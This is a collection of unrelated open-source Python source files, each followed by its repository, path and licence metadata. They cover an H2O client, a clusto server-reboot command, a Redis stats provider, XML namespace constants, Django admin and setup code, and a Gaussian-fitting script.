res = api("POST /3/ModelMetrics/predictions_frame/%s/actuals_frame/%s" % (predicted.frame_id, actual.frame_id),
data={"domain": domain, "distribution": distribution})
return res["model_metrics"]
def flow():
"""
Open H2O Flow in your browser.
"""
webbrowser.open(connection().base_url, new = 1)
#-----------------------------------------------------------------------------------------------------------------------
# Private
#-----------------------------------------------------------------------------------------------------------------------
def _check_connection():
if not h2oconn or not h2oconn.cluster:
raise H2OConnectionError("Not connected to a cluster. Did you run `h2o.connect()`?")
def _connect_with_conf(conn_conf):
conf = conn_conf
if isinstance(conn_conf, dict):
conf = H2OConnectionConf(config=conn_conf)
assert_is_type(conf, H2OConnectionConf)
return connect(url = conf.url, verify_ssl_certificates = conf.verify_ssl_certificates,
auth = conf.auth, proxy = conf.proxy,cookies = conf.cookies, verbose = conf.verbose)
#-----------------------------------------------------------------------------------------------------------------------
# ALL DEPRECATED METHODS BELOW
#-----------------------------------------------------------------------------------------------------------------------
# Deprecated since 2015-10-08
@deprecated("Deprecated, use ``h2o.import_file()``.")
def import_frame():
"""Deprecated."""
import_file()
# Deprecated since 2015-10-08
@deprecated("Deprecated (converted to a private method).")
def parse():
"""Deprecated."""
pass
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().show_status()``.")
def cluster_info():
"""Deprecated."""
_check_connection()
cluster().show_status()
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().show_status(True)``.")
def cluster_status():
"""Deprecated."""
_check_connection()
cluster().show_status(True)
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().shutdown()``.")
def shutdown(prompt=False):
"""Deprecated."""
_check_connection()
cluster().shutdown(prompt)
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().network_test()``.")
def network_test():
"""Deprecated."""
_check_connection()
cluster().network_test()
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().timezone``.")
def get_timezone():
"""Deprecated."""
_check_connection()
return cluster().timezone
# Deprecated since 2016-08-04
@deprecated("Deprecated, set ``h2o.cluster().timezone`` instead.")
def set_timezone(value):
"""Deprecated."""
_check_connection()
cluster().timezone = value
# Deprecated since 2016-08-04
@deprecated("Deprecated, use ``h2o.cluster().list_timezones()``.")
def list_timezones():
"""Deprecated."""
_check_connection()
return cluster().list_timezones()
|
mathemage/h2o-3
|
h2o-py/h2o/h2o.py
|
Python
|
apache-2.0
| 62,868
|
#!/usr/bin/env python
# -*- mode: python; sh-basic-offset: 4; indent-tabs-mode: nil; coding: utf-8 -*-
# vim: tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8
import argparse
import sys
import clusto
from clusto import script_helper
class Reboot(script_helper.Script):
'''
This will reboot a given server or IP address
'''
def __init__(self):
script_helper.Script.__init__(self)
def _add_arguments(self, parser):
parser.add_argument('--batch', action='store_true', default=False,
help='Batch mode, don\'t prompt for confirmation')
parser.add_argument('--method', default=None,
help='Use the given method to reboot this server (eg. ipmi)')
parser.add_argument('server', nargs='+',
help='Server name or IP address')
def add_subparser(self, subparsers):
parser = self._setup_subparser(subparsers)
self._add_arguments(parser)
def confirm(self, server):
print 'Parents: %s' % ' '.join([x.name for x in server.parents()])
response = raw_input('Are you sure you want to reboot %s (yes/no)? ' % server.name)
if response == 'yes':
return True
else:
return False
def run(self, args):
for name in args.server:
server = clusto.get(name)
if not server:
self.error('%s does not exist' % name)
continue
server = server[0]
if not hasattr(server, 'reboot'):
self.error('%s does not implement reboot()' % server.name)
return -1
if not args.batch:
if not self.confirm(server):
return -1
kwargs = {}
if args.method is not None:
kwargs['method'] = args.method
server.reboot(**kwargs)
def main():
reboot = Reboot()
parent_parser = script_helper.setup_base_parser()
this_parser = argparse.ArgumentParser(parents=[parent_parser],
description=reboot._get_description())
reboot._add_arguments(this_parser)
args = this_parser.parse_args()
reboot.init_script(args=args, logger=script_helper.get_logger(args.loglevel))
return(reboot.run(args))
if __name__ == '__main__':
sys.exit(main())
|
motivator/clusto
|
src/clusto/commands/reboot.py
|
Python
|
bsd-3-clause
| 2,325
|
from api.util import settings, timeutils
from datetime import datetime, timedelta
import redis
import json
import ast
class RedisStatsProvider(object):
"""A Redis based persistance to store and fetch stats"""
def __init__(self):
# redis server to use to store stats
stats_server = settings.get_redis_stats_server()
self.server = stats_server["server"]
self.port = stats_server["port"]
self.password = stats_server.get("password")
self.conn = redis.StrictRedis(host=self.server, port=self.port, db=0, password=self.password)
def save_memory_info(self, server, timestamp, used, peak):
"""Saves used and peak memory stats,
Args:
server (str): The server ID
timestamp (datetime): The time of the info.
used (int): Used memory value.
peak (int): Peak memory value.
"""
data = {"timestamp": str(timeutils.convert_to_epoch(timestamp)),
"used": used,
"peak": peak}
self.conn.zadd(server + ":memory", str(timeutils.convert_to_epoch(timestamp)), data)
def save_info_command(self, server, timestamp, info):
"""Save Redis info command dump
Args:
server (str): id of server
timestamp (datetime): Timestamp.
info (dict): The result of a Redis INFO command.
"""
self.conn.set(server + ":Info", json.dumps(info))
def save_monitor_command(self, server, timestamp, command, keyname,
argument):
"""save information about every command
Args:
server (str): Server ID
timestamp (datetime): Timestamp.
command (str): The Redis command used.
keyname (str): The key the command acted on.
argument (str): The args sent to the command.
"""
epoch = str(timeutils.convert_to_epoch(timestamp))
current_date = timestamp.strftime('%y%m%d')
# start a redis MULTI/EXEC transaction
pipeline = self.conn.pipeline()
# store top command and key counts in sorted set for every second
# top N are easily available from sorted set in redis
# also keep a sorted set for every day
# switch to daily stats when stats requsted are for a longer time period
command_count_key = server + ":CommandCount:" + epoch
pipeline.zincrby(command_count_key, command, 1)
command_count_key = server + ":DailyCommandCount:" + current_date
pipeline.zincrby(command_count_key, command, 1)
key_count_key = server + ":KeyCount:" + epoch
pipeline.zincrby(key_count_key, keyname, 1)
key_count_key = server + ":DailyKeyCount:" + current_date
pipeline.zincrby(key_count_key, keyname, 1)
# keep aggregate command in a hash
command_count_key = server + ":CommandCountBySecond"
pipeline.hincrby(command_count_key, epoch, 1)
command_count_key = server + ":CommandCountByMinute"
field_name = current_date + ":" + str(timestamp.hour) + ":"
field_name += str(timestamp.minute)
pipeline.hincrby(command_count_key, field_name, 1)
command_count_key = server + ":CommandCountByHour"
field_name = current_date + ":" + str(timestamp.hour)
pipeline.hincrby(command_count_key, field_name, 1)
command_count_key = server + ":CommandCountByDay"
field_name = current_date
pipeline.hincrby(command_count_key, field_name, 1)
# commit transaction to redis
pipeline.execute()
def get_info(self, server):
"""Get info about the server
Args:
server (str): The server ID
"""
info = self.conn.get(server + ":Info")
# FIXME: If the collector has never been run we get a 500 here. `None`
# is not a valid type to pass to json.loads.
info = json.loads(info)
return info
def get_memory_info(self, server, from_date, to_date):
"""Get stats for Memory Consumption between a range of dates
Args:
server (str): The server ID
from_date (datetime): Get memory info from this date onwards.
to_date (datetime): Get memory info up to this date.
"""
memory_data = []
start = timeutils.convert_to_epoch(from_date)
end = timeutils.convert_to_epoch(to_date)
rows = self.conn.zrangebyscore(server + ":memory", start, end)
for row in rows:
# TODO: Check to see if there's not a better way to do this. Using
# eval feels like it could be wrong/dangerous... but that's just a
# feeling.
row = ast.literal_eval(row)
parts = []
# convert the timestamp
timestamp = datetime.fromtimestamp(int(row['timestamp']))
timestamp = timestamp.strftime('%Y-%m-%d %H:%M:%S')
memory_data.append([timestamp, row['peak'], row['used']])
return memory_data
def get_command_stats(self, server, from_date, to_date, group_by):
"""Get total commands processed in the given time period
Args:
server (str): The server ID
from_date (datetime): Get data from this date.
to_date (datetime): Get data to this date.
group_by (str): How to group the stats.
"""
s = []
time_stamps = []
key_name = ""
if group_by == "day":
key_name = server + ":CommandCountByDay"
t = from_date.date()
while t <= to_date.date():
s.append(t.strftime('%y%m%d'))
time_stamps.append(str(timeutils.convert_to_epoch(t)))
t = t + timedelta(days=1)
elif group_by == "hour":
key_name = server + ":CommandCountByHour"
t = from_date
while t<= to_date:
field_name = t.strftime('%y%m%d') + ":" + str(t.hour)
s.append(field_name)
time_stamps.append(str(timeutils.convert_to_epoch(t)))
t = t + timedelta(seconds=3600)
elif group_by == "minute":
key_name = server + ":CommandCountByMinute"
t = from_date
while t <= to_date:
field_name = t.strftime('%y%m%d') + ":" + str(t.hour)
field_name += ":" + str(t.minute)
s.append(field_name)
time_stamps.append(str(timeutils.convert_to_epoch(t)))
t = t + timedelta(seconds=60)
else:
key_name = server + ":CommandCountBySecond"
start = timeutils.convert_to_epoch(from_date)
end = timeutils.convert_to_epoch(to_date)
for x in range(start, end + 1):
s.append(str(x))
time_stamps.append(x)
data = []
counts = self.conn.hmget(key_name, s)
for x in xrange(0,len(counts)):
# the default time format string
time_fmt = '%Y-%m-%d %H:%M:%S'
if group_by == "day":
time_fmt = '%Y-%m-%d'
elif group_by == "hour":
time_fmt = '%Y-%m-%d %H:00:00'
elif group_by == "minute":
time_fmt = '%Y-%m-%d %H:%M:00'
# get the count.
try:
if counts[x] is not None:
count = int(counts[x])
else:
count = 0
except Exception as e:
count = 0
# convert the timestamp
timestamp = int(time_stamps[x])
timestamp = datetime.fromtimestamp(timestamp)
timestamp = timestamp.strftime(time_fmt)
# add to the data
data.append([count, timestamp])
return reversed(data)
def get_top_commands_stats(self, server, from_date, to_date):
"""Get top commands processed in the given time period
Args:
server (str): Server ID
from_date (datetime): Get stats from this date.
to_date (datetime): Get stats to this date.
"""
counts = self.get_top_counts(server, from_date, to_date, "CommandCount",
"DailyCommandCount")
return reversed(counts)
def get_top_keys_stats(self, server, from_date, to_date):
"""Gets top comm processed
Args:
server (str): Server ID
from_date (datetime): Get stats from this date.
to_date (datetime): Get stats to this date.
"""
return self.get_top_counts(server, from_date, to_date, "KeyCount",
"DailyKeyCount")
# Helper methods
def get_top_counts(self, server, from_date, to_date, seconds_key_name,
day_key_name, result_count=None):
"""Top counts are stored in a sorted set for every second and for every
day. ZUNIONSTORE across the timeperiods generates the results.
Args:
server (str): The server ID
from_date (datetime): Get stats from this date.
to_date (datetime): Get stats to this date.
seconds_key_name (str): The key for stats at second resolution.
day_key_name (str): The key for stats at daily resolution.
Kwargs:
result_count (int): The number of results to return. Default: 10
"""
if result_count is None:
result_count = 10
# get epoch
start = timeutils.convert_to_epoch(from_date)
end = timeutils.convert_to_epoch(to_date)
diff = to_date - from_date
# start a redis MULTI/EXEC transaction
pipeline = self.conn.pipeline()
# store the set names to use in ZUNIONSTORE in a list
s = []
if diff.days > 2 :
# when difference is over 2 days, no need to check counts for every second
# Calculate:
# counts of every second on the start day
# counts of every day in between
# counts of every second on the end day
next_day = from_date.date() + timedelta(days=1)
prev_day = to_date.date() - timedelta(days=1)
from_date_end_epoch = timeutils.convert_to_epoch(next_day) - 1
to_date_begin_epoch = timeutils.convert_to_epoch(to_date.date())
# add counts of every second on the start day
for x in range(start, from_date_end_epoch + 1):
s.append(":".join([server, seconds_key_name, str(x)]))
# add counts of all days in between
t = next_day
while t <= prev_day:
s.append(":".join([server, day_key_name, t.strftime('%y%m%d')]))
t = t + timedelta(days=1)
# add counts of every second on the end day
for x in range(to_date_begin_epoch, end + 1):
s.append(server + ":" + seconds_key_name + ":" + str(x))
else:
# add counts of all seconds between start and end date
for x in range(start, end + 1):
s.append(server + ":" + seconds_key_name + ":" + str(x))
# store the union of all the sets in a temp set
temp_key_name = "_top_counts"
pipeline.zunionstore(temp_key_name, s)
pipeline.zrange(temp_key_name, 0, result_count - 1, True, True)
pipeline.delete(temp_key_name)
# commit transaction to redis
results = pipeline.execute()
result_data = []
for val, count in results[-2]:
result_data.append([val, count])
return result_data
|
fengshao0907/RedisLive
|
src/dataprovider/redisprovider.py
|
Python
|
mit
| 11,733
|
def number_string_with_postfix(number):
if number == 1:
return "1st"
elif number == 2:
return "2nd"
elif number == 3:
return "3rd"
else:
return "%sth" % number
|
JBarberU/strawberry_py
|
util/number_helper.py
|
Python
|
mit
| 186
|
"""NS module -- XML Namespace constants
This module contains the definitions of namespaces (and sometimes other
URI's) used by a variety of XML standards. Each class has a short
all-uppercase name, which should follow any (emerging) convention for
how that standard is commonly used. For example, ds is almost always
used as the namespace prefixes for items in XML Signature, so DS is the
class name. Attributes within that class, all uppercase, define symbolic
names (hopefully evocative) for "constants" used in that standard.
"""
class XMLNS:
"""XMLNS, Namespaces in XML
XMLNS (14-Jan-1999) is a W3C Recommendation. It is specified in
http://www.w3.org/TR/REC-xml-names
BASE -- the basic namespace defined by the specification
XML -- the namespace for XML 1.0
HTML -- the namespace for HTML4.0
"""
BASE = "http://www.w3.org/2000/xmlns/"
XML = "http://www.w3.org/XML/1998/namespace"
HTML = "http://www.w3.org/TR/REC-html40"
class XLINK:
"""XLINK, XML Linking Language
XLink (v1.0, 27-Jun-2001) is a W3C Recommendation. It is
specified in http://www.w3.org/TR/xlink/
"""
BASE = "http://www.w3.org/1999/xlink"
class SOAP:
"""SOAP, the Simple Object Access Protocol
SOAP (v1.1, 8-May-2000) is a W3C note. It is specified in
http://www.w3.org/TR/SOAP
ENV -- namespace for the SOAP envelope
ENC -- namespace for the SOAP encoding in section 5
ACTOR_NEXT -- the URI for the "next" actor
(Note that no BASE is defined.)
"""
ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ENC = "http://schemas.xmlsoap.org/soap/encoding/"
ACTOR_NEXT = "http://schemas.xmlsoap.org/soap/actor/next"
class DSIG:
"""DSIG, XML-Signature Syntax and Processing
DSIG (19-Apr-2001) is a W3C Candidate Recommendation. It is specified
in http://www.w3.org/TR/xmldsig-core/
BASE -- the basic namespace defined by the specification
DIGEST_SHA1 -- The SHA-1 digest method
DIGEST_MD2 -- The MD2 digest method
DIGEST_MD5 -- The MD5 digest method
SIG_DSA_SHA1 -- The DSA/DHA-1 signature method
SIG_RSA_SHA1 -- The RSA/DHA-1 signature method
HMAC_SHA1 -- The SHA-1 HMAC method
ENC_BASE64 -- The Base64 encoding method
ENVELOPED -- an enveloped XML signature
C14N -- XML canonicalization
C14N_COMM -- XML canonicalization, retaining comments
C14N_EXCL -- XML exclusive canonicalization
XPATH -- The identifier for an XPATH transform
XSLT -- The identifier for an XSLT transform
"""
BASE = "http://www.w3.org/2000/09/xmldsig#"
DIGEST_SHA1 = BASE + "sha1"
DIGEST_MD2 = BASE + "md2"
DIGEST_MD5 = BASE + "md5"
SIG_DSA_SHA1= BASE + "dsa-sha1"
SIG_RSA_SHA1= BASE + "rsa-sha1"
HMAC_SHA1 = BASE + "hmac-sha1"
ENC_BASE64 = BASE + "base64"
ENVELOPED = BASE + "enveloped-signature"
C14N = "http://www.w3.org/TR/2000/CR-xml-c14n-20010315"
C14N_COMM = C14N + "#WithComments"
C14N_EXCL = "http://www.w3.org/2001/10/xml-exc-c14n#"
XPATH = "http://www.w3.org/TR/1999/REC-xpath-19991116"
XSLT = "http://www.w3.org/TR/1999/REC-xslt-19991116"
class ENCRYPTION:
"""ENCRYPTION, XML-Encryption Syntax and Processing
ENCRYPTION (26-Jun-2001) is a W3C Working Draft. It is specified in
http://www.w3.org/TR/xmlenc-core/
BASE -- the basic namespace defined by the specification
BLOCK_3DES -- The triple-DES symmetric encryption method
BLOCK_AES128 -- The 128-bit AES symmetric encryption method
BLOCK_AES256 -- The 256-bit AES symmetric encryption method
BLOCK_AES192 -- The 192-bit AES symmetric encryption method
STREAM_ARCFOUR -- The ARCFOUR symmetric encryption method
KT_RSA_1_5 -- The RSA v1.5 key transport method
KT_RSA_OAEP -- The RSA OAEP key transport method
KA_DH -- The Diffie-Hellman key agreement method
WRAP_3DES -- The triple-DES symmetric key wrap method
WRAP_AES128 -- The 128-bit AES symmetric key wrap method
WRAP_AES256 -- The 256-bit AES symmetric key wrap method
WRAP_AES192 -- The 192-bit AES symmetric key wrap method
DIGEST_SHA256 -- The SHA-256 digest method
DIGEST_SHA512 -- The SHA-512 digest method
DIGEST_RIPEMD160 -- The RIPEMD-160 digest method
"""
BASE = "http://www.w3.org/2001/04/xmlenc#"
BLOCK_3DES = BASE + "des-cbc"
BLOCK_AES128 = BASE + "aes128-cbc"
BLOCK_AES256 = BASE + "aes256-cbc"
BLOCK_AES192 = BASE + "aes192-cbc"
STREAM_ARCFOUR = BASE + "arcfour"
KT_RSA_1_5 = BASE + "rsa-1_5"
KT_RSA_OAEP = BASE + "rsa-oaep-mgf1p"
KA_DH = BASE + "dh"
WRAP_3DES = BASE + "kw-3des"
WRAP_AES128 = BASE + "kw-aes128"
WRAP_AES256 = BASE + "kw-aes256"
WRAP_AES192 = BASE + "kw-aes192"
DIGEST_SHA256 = BASE + "sha256"
DIGEST_SHA512 = BASE + "sha512"
DIGEST_RIPEMD160 = BASE + "ripemd160"
class SCHEMA:
"""SCHEMA, XML Schema
XML Schema (30-Mar-2001) is a W3C candidate recommendation. It is
specified in http://www.w3.org/TR/xmlschema-1 (Structures) and
http://www.w3.org/TR/xmlschema-2 (Datatypes). Schema has been under
development for a comparitively long time, and other standards have
at times used earlier drafts. This class defines the most-used, and
sets BASE to the latest.
BASE -- the basic namespace (2001)
XSD1, XSI1 -- schema and schema-instance for 1999
XSD2, XSI2 -- schema and schema-instance for October 2000
XSD3, XSI3 -- schema and schema-instance for 2001
XSD_LIST -- a sequence of the XSDn values
XSI_LIST -- a sequence of the XSIn values
"""
XSD1 = "http://www.w3.org/1999/XMLSchema"
XSD2 = "http://www.w3.org/2000/10/XMLSchema"
XSD3 = "http://www.w3.org/2001/XMLSchema"
XSD_LIST = [ XSD1, XSD2, XSD3 ]
XSI1 = "http://www.w3.org/1999/XMLSchema-instance"
XSI2 = "http://www.w3.org/2000/10/XMLSchema-instance"
XSI3 = "http://www.w3.org/2001/XMLSchema-instance"
XSI_LIST = [ XSI1, XSI2, XSI3 ]
BASE = XSD3
class XSLT:
"""XSLT, XSL Transformations
XSLT (16-Nov-1999) is a W3C Recommendation. It is specified in
http://www.w3.org/TR/xslt/
BASE -- the basic namespace defined by this specification
"""
BASE = "http://www.w3.org/1999/XSL/Transform"
class XPATH:
"""XPATH, XML Path Language
XPATH (16-Nov-1999) is a W3C Recommendation. It is specified in
http://www.w3.org/TR/xpath. This class is currently empty.
"""
pass
class WSDL:
"""WSDL, Web Services Description Language
WSDL (V1.1, 15-Mar-2001) is a W3C Note. It is specified in
http://www.w3.org/TR/wsdl
BASE -- the basic namespace defined by this specification
BIND_SOAP -- SOAP binding for WSDL
BIND_HTTP -- HTTP GET and POST binding for WSDL
BIND_MIME -- MIME binding for WSDL
"""
BASE = "http://schemas.xmlsoap.org/wsdl/"
BIND_SOAP = BASE + "soap/"
BIND_HTTP = BASE + "http/"
BIND_MIME = BASE + "mime/"
class RNG:
"""RELAX NG, schema language for XML
RELAX NG (03-Dec-2001) is a simple schema languge for XML,
published under the auspices of OASIS. The specification, tutorial,
and other information are available from http://www.relaxng.org.
"""
BASE = "http://relaxng.org/ns/structure/1.0"
class DCMI:
"""Dublin Core Metadata Initiative
The DCMI defines a commonly-used set of general metadata elements.
There is a base set of elements, a variety of refinements of
those, a set of value encodings, and a 'type vocabulary' used to
describe what something described in metadata actually is (a text,
a physical object, a collection, etc.).
Documentation on the Dublin Core, including recommendations for
encoding Dublin Core metadata in XML and HTML/XHTML can be found
at http://dublincore.org/.
"""
# not used directly:
BASE = "http://purl.org/dc/"
# the core element set:
DCMES_1_1 = BASE + "elements/1.1/"
DCMES = DCMES_1_1
# standardized additions and refinements:
TERMS = BASE + "terms/"
# type vocabulary:
TYPE = BASE + "dcmitype/"
class _Namespace:
"""Base class for Namespace classes.
Namespace objects are a convenient way to 'spell' (uri, localName)
pairs in application code. A namespace object would be created to
represent a namespace (URI), and attributes of the namespace
object would represent the (uri, localName) pairs.
For example, a namespace object would be created by providing the
URI are any known local names for that namespace to the
constructor:
xbel = pyxml.ns.ClosedNamespace(
'http://www.python.org/topics/xml/xbel/',
['xbel', 'title', 'info', 'metadata', 'folder', 'bookmark',
'desc', 'separator', 'alias'])
Specific (uri, localName) pairs can then be referenced by more
convenient names:
xbel.title # ==> ('http://www.python.org/topics/xml/xbel/', 'title')
This can be convenient in (for example) SAX ContentHandler
implementations.
"""
def __init__(self, uri, names):
d = self.__dict__
for name in names:
d[name] = (uri, name)
class ClosedNamespace(_Namespace):
"""Namespace that doesn't allow names to be added after instantiation.
This is useful when the set of names for the namespace is known in
advance; using a ClosedNamespace doesn't allow names to be added
inadvertently.
"""
def __setattr__(self, name, value):
raise AttributeError("can't set attributes on a ClosedNamespace")
class OpenNamespace(_Namespace):
"""Namespace that allows names to be added automatically.
When attributes of these objects are referenced, (uri, localName)
pairs are generated for the name if they don't already exist.
"""
def __init__(self, uri, names=()):
_Namespace.__init__(self, uri, names)
self.__uri = uri
def __getattr__(self, name):
t = self.__uri, name
setattr(self, name, t)
return t
|
wuzhenda/gaedav
|
pyxml/ns.py
|
Python
|
lgpl-2.1
| 10,457
|
from django.contrib import admin
from alert.donate.models import Donation
from alert.userHandling.models import UserProfile
class DonorInline(admin.TabularInline):
model = UserProfile.donation.through
max_num = 1
raw_id_fields = (
'userprofile',
)
class DonationAdmin(admin.ModelAdmin):
readonly_fields = (
'date_modified',
'date_created',
)
list_display = (
'__str__',
'amount',
'payment_provider',
'status',
'date_created',
'referrer',
)
list_filter = (
'payment_provider',
'status',
'referrer',
)
inlines = (
DonorInline,
)
admin.site.register(Donation, DonationAdmin)
|
shashi792/courtlistener
|
alert/donate/admin.py
|
Python
|
agpl-3.0
| 730
|
import unittest
from unittest import mock
from tests.recipes.recipe_lib_test import BaseTestForMakeRecipe
class TestLibvorbisRecipe(BaseTestForMakeRecipe, unittest.TestCase):
"""
An unittest for recipe :mod:`~pythonforandroid.recipes.libvorbis`
"""
recipe_name = "libvorbis"
sh_command_calls = ["./configure"]
extra_env_flags = {'CFLAGS': 'libogg/include'}
@mock.patch("pythonforandroid.recipes.libvorbis.sh.cp")
@mock.patch("pythonforandroid.util.chdir")
@mock.patch("pythonforandroid.build.ensure_dir")
@mock.patch("pythonforandroid.archs.glob")
@mock.patch("pythonforandroid.archs.find_executable")
def test_build_arch(
self,
mock_find_executable,
mock_glob,
mock_ensure_dir,
mock_current_directory,
mock_sh_cp,
):
# We overwrite the base test method because we need to mock a little
# more with this recipe (`sh.cp`)
super().test_build_arch()
# make sure that the mocked methods are actually called
mock_sh_cp.assert_called()
|
kivy/python-for-android
|
tests/recipes/test_libvorbis.py
|
Python
|
mit
| 1,073
|
#!/usr/bin/env python
import os
import sys
from fnmatch import fnmatchcase
from setuptools import setup,find_packages
from distutils.util import convert_path
# Provided as an attribute, so you can append to these instead
# of replicating them:
standard_exclude = ["*.py", "*.pyc", "*~", ".*", "*.bak", "Makefile"]
standard_exclude_directories = [
".*", "CVS", "_darcs", "./build",
"./dist", "EGG-INFO", "*.egg-info",
"./example"
]
# Copied from paste/util/finddata.py
def find_package_data(where=".", package="", exclude=standard_exclude,
exclude_directories=standard_exclude_directories,
only_in_packages=True, show_ignored=False):
"""
Return a dictionary suitable for use in ``package_data``
in a distutils ``setup.py`` file.
The dictionary looks like::
{"package": [files]}
Where ``files`` is a list of all the files in that package that
don't match anything in ``exclude``.
If ``only_in_packages`` is true, then top-level directories that
are not packages won't be included (but directories under packages
will).
Directories matching any pattern in ``exclude_directories`` will
be ignored; by default directories with leading ``.``, ``CVS``,
and ``_darcs`` will be ignored.
If ``show_ignored`` is true, then all the files that aren't
included in package data are shown on stderr (for debugging
purposes).
Note patterns use wildcards, or can be exact paths (including
leading ``./``), and all searching is case-insensitive.
"""
out = {}
stack = [(convert_path(where), "", package, only_in_packages)]
while stack:
where, prefix, package, only_in_packages = stack.pop(0)
for name in os.listdir(where):
fn = os.path.join(where, name)
if os.path.isdir(fn):
bad_name = False
for pattern in exclude_directories:
if (fnmatchcase(name, pattern)
or fn.lower() == pattern.lower()):
bad_name = True
if show_ignored:
print >> sys.stderr, (
"Directory %s ignored by pattern %s"
% (fn, pattern))
break
if bad_name:
continue
if (os.path.isfile(os.path.join(fn, "__init__.py"))
and not prefix):
if not package:
new_package = name
else:
new_package = package + "." + name
stack.append((fn, "", new_package, False))
else:
stack.append((fn, prefix + name + "/", package, only_in_packages))
elif package or not only_in_packages:
# is a file
bad_name = False
for pattern in exclude:
if (fnmatchcase(name, pattern)
or fn.lower() == pattern.lower()):
bad_name = True
if show_ignored:
print >> sys.stderr, (
"File %s ignored by pattern %s"
% (fn, pattern))
break
if bad_name:
continue
out.setdefault(package, []).append(prefix+name)
return out
excluded_directories = standard_exclude_directories
package_data = find_package_data(exclude_directories=excluded_directories)
METADATA = dict(
name='django-allauth',
version='0.8.1',
author='Raymond Penners',
author_email='raymond.penners@intenct.nl',
description='Integrated set of Django applications addressing authentication, registration, account management as well as 3rd party (social) account authentication.',
long_description=open('README.rst').read(),
url='http://github.com/pennersr/django-allauth',
keywords='django auth account social openid twitter facebook oauth registration',
install_requires=['django',
'oauth2',
'python-openid'],
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'Environment :: Web Environment',
'Topic :: Internet',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
packages=find_packages(exclude=['example']),
package_data=package_data
)
if __name__ == '__main__':
setup(**METADATA)
|
GinnyN/towerofdimensions-django
|
django-allauth/setup.py
|
Python
|
bsd-3-clause
| 4,743
|
# Copyright (c) 2012 Web Notes Technologies Pvt Ltd (http://erpnext.com)
#
# MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import unicode_literals
import webnotes
class DocType:
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
self.doc.name = self.doc.doc_type + "-" \
+ (self.doc.field_name and (self.doc.field_name + "-") or "") \
+ self.doc.property
def validate(self):
"""delete other property setters on this, if this is new"""
if self.doc.fields['__islocal']:
webnotes.conn.sql("""delete from `tabProperty Setter` where
doctype_or_field = %(doctype_or_field)s
and doc_type = %(doc_type)s
and ifnull(field_name,'') = ifnull(%(field_name)s, '')
and property = %(property)s""", self.doc.fields)
# clear cache
webnotes.clear_cache(doctype = self.doc.doc_type)
def get_property_list(self, dt):
return webnotes.conn.sql("""select fieldname, label, fieldtype
from tabDocField
where parent=%s
and fieldtype not in ('Section Break', 'Column Break', 'HTML', 'Read Only', 'Table')
and ifnull(fieldname, '') != ''
order by label asc""", dt, as_dict=1)
def get_setup_data(self):
return {
'doctypes': [d[0] for d in webnotes.conn.sql("select name from tabDocType")],
'dt_properties': self.get_property_list('DocType'),
'df_properties': self.get_property_list('DocField')
}
def get_field_ids(self):
return webnotes.conn.sql("select name, fieldtype, label, fieldname from tabDocField where parent=%s", self.doc.doc_type, as_dict = 1)
def get_defaults(self):
if not self.doc.field_name:
return webnotes.conn.sql("select * from `tabDocType` where name=%s", self.doc.doc_type, as_dict = 1)[0]
else:
return webnotes.conn.sql("select * from `tabDocField` where fieldname=%s and parent=%s",
(self.doc.field_name, self.doc.doc_type), as_dict = 1)[0]
def on_update(self):
from core.doctype.doctype.doctype import validate_fields_for_doctype
validate_fields_for_doctype(self.doc.doc_type)
|
gangadhar-kadam/mic-wnframework
|
core/doctype/property_setter/property_setter.py
|
Python
|
mit
| 3,077
|
s = "Soy tu padre"
print s.replace("a","*",len(s))
|
CarlosRA97/explorer-interface
|
metodo_cadenas.py
|
Python
|
gpl-2.0
| 51
|
# import pytest
# @pytest.mark.asyncio
# async def test_async_execute(df):
# count_future = df.count(df.x, delay=True)
# await df.execute_async()
# assert await count_future == len(df)
|
maartenbreddels/vaex
|
tests/async_test.py
|
Python
|
mit
| 200
|
from matplotlib import rcParams, rc
from spuriousRadioProbRangeP1 import probsOfGRP
from util import mpfit
from util.fitFunctions import gaussian
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import scipy.stats
import tables
import scipy.special
def fitGauss(xdata,ydata,yerr,flatLine=False):
nBins=100
amplitude = .5*np.max(ydata)
x_offset = xdata[np.argmax(ydata)]
sigma = (np.max(xdata)-np.min(xdata))/10.
y_offset = 3.
fixed = [False]*4
if flatLine == True:
amplitude = 0
fixed[0:3] = [True]*3
params=[sigma, x_offset, amplitude, y_offset] # First guess at fit params
errs = yerr
errs[np.where(errs == 0.)] = 1.
quiet = True
parinfo = [ {'n':0,'value':params[0],'limits':[.0001, .1], 'limited':[True,True],'fixed':fixed[0],'parname':"Sigma",'error':0},
{'n':1,'value':params[1],'limits':[x_offset-sigma*3, x_offset+sigma*3],'limited':[True,True],'fixed':fixed[1],'parname':"x offset",'error':0},
{'n':2,'value':params[2],'limits':[.2*amplitude, 3.*amplitude],'limited':[True,True],'fixed':fixed[2],'parname':"Amplitude",'error':0},
{'n':3,'value':params[3],'limited':[False,False],'fixed':fixed[3],'parname':"y_offset",'error':0}]
fa = {'x':xdata,'y':ydata,'err':yerr}
